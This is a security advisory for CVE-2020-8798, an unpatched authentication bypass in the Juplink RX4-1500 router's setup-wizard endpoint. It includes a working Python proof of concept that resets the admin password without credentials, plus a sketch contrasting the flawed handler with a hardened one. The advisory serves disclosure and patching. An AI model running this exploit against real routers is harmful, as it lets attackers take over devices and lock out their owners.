
CVE-2020-8798

This vulnerability is an authentication bypass in the Juplink RX4-1500 router. It is still present as of firmware version 1.0.5; the vendor has not patched it. I have decided to release the vulnerability more than 120 days after the initial disclosure as an incentive to patch this critical issue.

The vulnerability allows a malicious user to submit POST data to /setup3.htm without authentication. An attacker can arbitrarily change the admin password, Wi-Fi SSID, Wi-Fi password, and many other configuration variables. Until version 1.0.3, this also led to remote execution of Linux system commands, because an attacker could enable the debugging telnet interface.

The critical bug is in an endpoint that the router uses while running through its setup wizard. Unfortunately, the manufacturer's firmware never checks whether the router has already been configured, so requests to this endpoint always succeed, even on a fully set-up device.

This can be demonstrated with the following Python 3 script:

#!/usr/bin/python3
import base64
import requests

# The admin password to set
ADMIN_PWD = "admin"

# Address of the vulnerable setup-wizard endpoint
addr = "http://192.168.0.1/setup3.htm"

# Form parameters; the password is base64-encoded as the wizard expects
params = {
    'a': 'set',
    'x': 'Device.X_BROADCOM_COM_LoginCfg.',
    'AdminPassword': base64.b64encode(ADMIN_PWD.encode("utf-8")).decode("ascii"),
}

# Send the POST request without any session or credentials
resp = requests.post(addr, data=params)
print(resp.status_code)
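The missing check described above, modelled as an added example that is not the vendor's firmware code: a stand-in for the /setup3.htm handler in its flawed form next to a hardened form that only accepts writes during first-run setup or from an authenticated admin session. The `RouterState` fields, the `session` argument and the numeric return codes are assumptions for illustration.

```python
import base64
import binascii
from dataclasses import dataclass, field

@dataclass
class RouterState:
    """Hypothetical device state; the real firmware keeps this in NVRAM."""
    configured: bool = False                 # set once the wizard completes
    admin_password: str = "admin"
    authenticated_sessions: set = field(default_factory=set)

def _apply_login_cfg(state, form):
    """Shared write path: returns 200 on success, 400 on malformed input."""
    if form.get("a") != "set" or "AdminPassword" not in form:
        return 400
    try:
        pwd = base64.b64decode(form["AdminPassword"], validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return 400
    state.admin_password = pwd
    state.configured = True
    return 200

def handle_setup3_vulnerable(state, form, session=None):
    """Mirrors the flaw: the wizard endpoint honours any POST, configured or not."""
    return _apply_login_cfg(state, form)

def handle_setup3_hardened(state, form, session=None):
    """Writes are allowed only before setup finishes or from an admin session."""
    if state.configured and session not in state.authenticated_sessions:
        return 403
    return _apply_login_cfg(state, form)

# Constructed request body shaped like the advisory's POST (not captured traffic)
ATTACKER_FORM = {
    "a": "set",
    "x": "Device.X_BROADCOM_COM_LoginCfg.",
    "AdminPassword": base64.b64encode(b"pwned").decode("ascii"),
}
```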

For more information and vulnerability analysis, please see my report on the Juplink RX4-1500.